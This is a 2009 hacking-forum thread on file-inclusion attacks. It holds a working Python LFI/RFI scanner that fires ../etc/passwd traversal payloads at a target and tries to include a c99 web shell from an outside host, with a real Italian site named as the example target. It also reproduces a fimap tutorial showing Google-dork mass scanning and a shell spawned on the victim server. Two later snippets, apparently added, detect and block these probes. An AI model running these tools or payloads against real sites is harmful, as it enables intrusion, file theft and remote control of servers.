Dark Angel Forum Index
Dark Angel: Hacking and Reverse (Hacking -> WebApps)

:: RFI and LFI ::
Karl
Member
Offline

Joined: 23 Nov 2009
Posts: 108

Posted: Sun 29 Nov - 18:41 (2009)    Subject: RFI and LFI

#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
# In version 2 added proxy support
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# — d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# — QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# — Eliminator and to all members of darkc0de and ljuska.org# #
################################################################

# Python 2 script (print statement, urllib2, httplib).
import sys, os, time, re, urllib2, socket, httplib

# Clear the terminal with the platform's command.
if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

proxy = "None"
count = 0

if len(sys.argv) < 2 or len(sys.argv) > 4:
    print "\n|---------------------------------------------------------------|"
    print "|                    b4ltazar[@]gmail[dot]com                   |"
    print "|              01/2009  LFI & RFI scanner v2.0                  |"
    print "|                    Help: lfi-rfi.py -h                        |"
    print "|          Visit www.darkc0de.com and www.ljuska.org            |"
    print "|---------------------------------------------------------------|\n"
    sys.exit(1)

# Parse the optional -h / -p PROXY arguments; count tracks the position of each argument.
for arg in sys.argv:
    if arg == '-h' or arg == '--help' or arg == '-help':
        print "\n|-------------------------------------------------------------------------------|"
        print "|                            b4ltazar[@]gmail[dot]com                           |"
        print "|                       01/2009  LFI & RFI scanner v2.0                         |"
        print "|                       Usage: lfi-rfi.py www.site.com                          |"
        print "|         Example: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina=     |"
        print "|  Proxy: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= -p PROXY     |"
        print "|                  Visit www.darkc0de.com and www.ljuska.org                    |"
        print "|-------------------------------------------------------------------------------|\n"
        sys.exit(1)
    elif arg == '-p':
        proxy = sys.argv[count+1]
    count += 1

# Traversal payloads for /etc/passwd, with and without a trailing null byte.
lfis = ["/etc/passwd%00", "../etc/passwd%00", "../../etc/passwd%00",
        "../../../etc/passwd%00", "../../../../etc/passwd%00",
        "../../../../../etc/passwd%00", "../../../../../../etc/passwd%00",
        "../../../../../../../etc/passwd%00", "../../../../../../../../etc/passwd%00",
        "../../../../../../../../../etc/passwd%00", "../../../../../../../../../../etc/passwd%00",
        "../../../../../../../../../../../etc/passwd%00",
        "../../../../../../../../../../../../etc/passwd%00",
        "../../../../../../../../../../../../../etc/passwd%00",
        "/etc/passwd", "../etc/passwd", "../../etc/passwd",
        "../../../etc/passwd", "../../../../etc/passwd",
        "../../../../../etc/passwd", "../../../../../../etc/passwd",
        "../../../../../../../etc/passwd", "../../../../../../../../etc/passwd",
        "../../../../../../../../../etc/passwd", "../../../../../../../../../../etc/passwd",
        "../../../../../../../../../../../etc/passwd",
        "../../../../../../../../../../../../etc/passwd",
        "../../../../../../../../../../../../../etc/passwd"]

site = sys.argv[1]
shell = 'http://www.defcont4.hypersite.com.br/shell/c99.txt?'
if site[:4] != "http":
    site = "http://"+site
if site[-1] != "=":
    site = site + "="

print "\n|---------------------------------------------------------------|"
print "|                    b4ltazar[@]gmail[dot]com                   |"
print "|              01/2009  LFI & RFI scanner v2.0                  |"
print "|          Visit www.darkc0de.com and www.ljuska.org            |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print
print "-"*80
print "\t\t\tChecking for LFI"
print "-"*80
print "\n[+] Target:", site
print "[+]", len(lfis), "LFI loaded..."
print "[+] Starting Scan...\n"

# Build the proxy handler (an empty ProxyHandler means a direct connection).
try:
    if proxy != "None":
        print "\n[+] Testing Proxy..."
        pr = httplib.HTTPConnection(proxy)
        pr.connect()
        print "[+] Proxy:", proxy
        print "[+] Building Handler"
        print
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
    else:
        print "\n[-] Proxy not given"
        print
        proxy_handler = urllib2.ProxyHandler({})
except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    sys.exit(1)
except Exception, msg:
    print msg
    print "\n[-] Proxy Failed"
    sys.exit(1)

# A response containing "root:x:" means the payload read /etc/passwd.
for lfi in lfis:
    print "[+] Checking:", site+lfi.replace("\n", "")
    print
    proxyfier = urllib2.build_opener(proxy_handler)
    try:
        check = proxyfier.open(site+lfi.replace("\n", "")).read()
        if re.findall("root:x:", check):
            print "[!] w00t!,w00t!: ", lfi
            print
        else:
            print "[-] Not Found: ", lfi
            print
    except(urllib2.HTTPError):
        pass
    except(KeyboardInterrupt, SystemExit):
        raise
print
print "-"*80
print "\t\t\tChecking for RFI"
print "-"*80
print "\n[+] Target:", site
print "[+] Starting Scan...\n"

# A response containing "c99shell" means the remote URL was included.
try:
    check = proxyfier.open(site+shell).read()
    if re.findall("c99shell", check):
        print "[!] w00t!,w00t!: ", site+shell
        print
    else:
        print "[-] Not Found: ", site+shell
        print
except(urllib2.HTTPError):
    pass
except(KeyboardInterrupt, SystemExit):
    pass

print
print "\n[-] %s" % time.strftime("%X")


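Added example, not part of Karl's post or the scanner above: a defender-side check that flags the request patterns this scanner sends (traversal to /etc/passwd, a %00 null byte, a remote URL or php:// wrapper in a query parameter) in web-server access logs. The log lines and the hostname attacker.example are constructed.

```python
# Added example (not from the forum post): flag LFI/RFI probe patterns, such as the
# ones the scanner above sends, in web-server access logs. Log lines are constructed.
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines in common log format.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2009:18:41:02 +0100] "GET /index.php?pagina=../../../../etc/passwd%00 HTTP/1.1" 200 1834
10.0.0.5 - - [29/Nov/2009:18:41:03 +0100] "GET /index.php?pagina=http://attacker.example/shell.txt? HTTP/1.1" 200 512
10.0.0.9 - - [29/Nov/2009:18:42:10 +0100] "GET /index.php?pagina=php://input HTTP/1.1" 200 99
10.0.0.7 - - [29/Nov/2009:18:43:00 +0100] "GET /index.php?pagina=about HTTP/1.1" 200 4021
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator checks run on the decoded value of every query parameter.
INDICATORS = {
    "traversal": re.compile(r"(\.\./|\.\.\\)"),
    "nullbyte": re.compile(r"\x00"),
    "sensitive_file": re.compile(r"/etc/passwd|/proc/self/environ"),
    "remote_or_wrapper": re.compile(r"^(https?|ftp|php)://", re.IGNORECASE),
}


def classify_request(uri):
    """Return the set of indicator names matched by any query parameter of the URI."""
    query = urlsplit(uri).query
    hits = set()
    for _, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches double encoding
        for name, pattern in INDICATORS.items():
            if pattern.search(decoded):
                hits.add(name)
    return hits


def scan_log(text):
    """Return (ip, uri, status, sorted indicators) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("uri"))
        if hits:
            findings.append((m.group("ip"), m.group("uri"), int(m.group("status")), sorted(hits)))
    return findings
```

A 200 status on a flagged request is the case worth triaging first, since the scanner only reports success when the response body contains the included file.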
Karl

Posted: Sun 29 Nov - 19:51 (2009)    Subject: RFI and LFI

Fimap
A little tool for local and remote file inclusion auditing and exploitation.

http://fimap.googlecode.com/files/fimap_alpha_v06_1.tar.gz


Karl

Posted: Wed 16 Dec - 11:18 (2009)    Subject: RFI and LFI

Title : LFI/RFI testing and exploiting with fimap
Author : Iman Karim (ikarim2s[YOUKNOW]smail.inf.fh-brs.de)
Date : 3. September 2009
Project: http://fimap.googlecode.com


fimap is currently under development but still usable. Feel free to test it!
This document and tool are not recommended for people who don't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.


Table of Contents
0. Introduction
[a] What is fimap?
[b] Let's go.
1. Single URL Scan
[a] Why?
[b] Ok - show me how.
2. Mass Scan
3. Google Scan
4. Obtaining a shell
5. Full Example Run
6. Last Words
7. Greetings



[0] INTRODUCTION
[a] What is fimap?
fimap is a Local- and Remote-File-Injection scanner and exploiter written by me.
It's released under GPLv2 and you can download it at http://fimap.googlecode.com

[b] LET'S GO
Before we start make sure that you don't use fimap for illegal stuff.
Use it only on your own site to test if your inclusions are secure or not.
You use it at your own risk and I don't take any responsibility for it.
Ok - Let's go then!

[1] SINGLE URL SCAN
[a] Why?
Sometimes I am playing with my website's GET variables in the browser to check for inclusion bugs.
When I actually find something, fimap is my friend. I can simply give it the URL I found and fimap
will do the rest for me.

[b] Ok - show me how.
It's very easy to start a single url scan.
Simply start fimap using the -u or --url parameter:

imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"

If fimap has found an Inclusion-Bug, you will see a box like this:

###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################

You can see that we actually have readable files. Some of them are usable to inject code - some not.
fimap will automatically log every valuable result to '~/fimap_results.xml'. The XML will never be deleted.
All new results will be injected correctly into the XML. Feel free to delete it if you want.
Possible injections which can't be successfully exploited by fimap will be logged into a dirty
csv file: '~/fimap.log'

Well, that's it for single url scanning! :)
If you want to spawn a shell using your newly found bug(s) watch [4]

[2] MASS SCAN
Mass scanning is very similar to single url scanning. The only difference is (you guessed it):
you can scan a whole txt file (each line = one url) for inclusion bugs.
Just like in single url mode everything will be logged to the log files.
To use mass mode use:

imax@DevelB0x:~$ ./fimap.py -m -l "/tmp/myurllist.txt"


[3] GOOGLE SCAN
Same as mass scan. But instead of getting the urls from a txt-list it will use google to get urls.
To use google mode use:

imax@DevelB0x:~$ ./fimap.py -g -q 'inurl:"include.php"'
or
imax@DevelB0x:~$ ./fimap.py -g -q 'inurl:"req.php" -svn -trak -cvs'

[4] OBTAINING A SHELL
If you have found some inclusion bugs you can directly make use of them!
Simply call:

imax@DevelB0x:~$ ./fimap.py -x

fimap will ask you some questions and then you should have a shell!

[5] FULL EXAMPLE RUN

[CMD]imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index.php'
[OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index.php'...
[INFO] Fiddling around with URL...
[OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=bUTeWg6j' with Parameter 'inc'.
[OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index.php' with Key 'inc'...
[INFO] Scriptpath received: '/var/www'
[INFO] Testing file '/etc/passwd'...
[INFO] Testing file '/proc/self/environ'...
[INFO] Testing file 'php://input'...
[INFO] Testing file 'http://www.phpbb.de/index.php'...
[INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...
[INFO] Testing file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'...
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index.php #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
[CMD]imax@DevelB0x:~$ ./fimap.py -x
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
###############################################################################################
#FI Bugs on localhost #
###############################################################################################
#[1] URL: '/vulnerable.php?inc=index.php' injecting file: 'php://input' using param: 'inc' #
###############################################################################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST...
[OUT] PHP Injection works! Testing if execution works...
[OUT] Testing execution thru 'popen'...
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell... #
#################################
Choose Attack: 1
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Enter 'q' to exit the shell.
-------------------------------------------
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q

See ya dude!


[6] LAST WORDS
You can configure most of the attack vectors in the config.py file inside your fimap directory.
The file is documented. So check the file for more info. All I can say here is that if you
want the full advantage of RFI attacks you should configure your settings["dynamic_rfi"] dict.
Please remember that fimap is currently under a week old and under heavy development.
Go to http://fimap.googlecode.com and stay tuned about updates.
To check out the latest code use:
svn checkout http://fimap.googlecode.com/svn/trunk/ fimap

I don't know and currently don't care if it works on windows. Works fine on Unixes.
If you find a bug feel free to report it.
I hope you like it.

[7] GREETINGS
Greetings to: rita, exorzist, invisible, ruun, beatkeeper, dextrous


Afghans can code too! :)



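Added example, not fimap's code or part of the tutorial above: the include-side mitigation for the readable-file classes fimap's report lists (/etc/passwd via ../ traversal, %00 null-byte truncation, php://input, remote http:// URLs). Python stands in for the PHP include() logic; the web root, its two pages and the hostname attacker.example are constructed.

```python
# Added example (not fimap's code or the tutorial's): an include-parameter resolver
# that refuses the input classes fimap's report lists as readable/injectable.
# Python stands in for the PHP include() logic; the web root is built in a temp dir.
import os
import tempfile

PAGE_EXT = ".php"  # only files with this extension under the web root may be included


class IncludeRejected(ValueError):
    """Raised when an include parameter fails validation."""


def resolve_include(param, base_dir):
    """Map an untrusted 'inc'-style parameter to a file strictly inside base_dir.

    Order of checks: NUL byte (null-byte truncation, the %00 payloads), URL scheme
    or PHP stream wrapper (remote inclusion, php://input), then realpath
    containment (../ traversal to /etc/passwd) and existence.
    """
    if "\x00" in param:
        raise IncludeRejected("NUL byte in parameter")
    if "://" in param or param.lower().startswith(("php:", "data:", "file:")):
        raise IncludeRejected("scheme or stream wrapper not allowed")
    base = os.path.realpath(base_dir)
    name = param.lstrip("/\\")  # force a relative name
    if not name.endswith(PAGE_EXT):
        name += PAGE_EXT  # the parameter may pick a page, never an arbitrary file
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeRejected("path escapes base directory")
    if not os.path.isfile(candidate):
        raise IncludeRejected("no such page")
    return candidate


def demo():
    """Build a constructed web root with two pages and resolve sample parameters."""
    root = tempfile.mkdtemp()
    for page in ("index.php", "about.php"):
        with open(os.path.join(root, page), "w") as fh:
            fh.write("<?php /* constructed page */ ?>\n")
    samples = ("index.php", "about", "../../../../etc/passwd",
               "../../etc/passwd\x00", "php://input",
               "http://attacker.example/shell.txt?")
    results = {}
    for p in samples:
        try:
            results[p] = os.path.basename(resolve_include(p, root))
        except IncludeRejected as exc:
            results[p] = "rejected: " + str(exc)
    return results
```

Calling demo() resolves the two legitimate pages and rejects the four probe values; an explicit allowlist of page names is the stricter alternative when the set of includable pages is small.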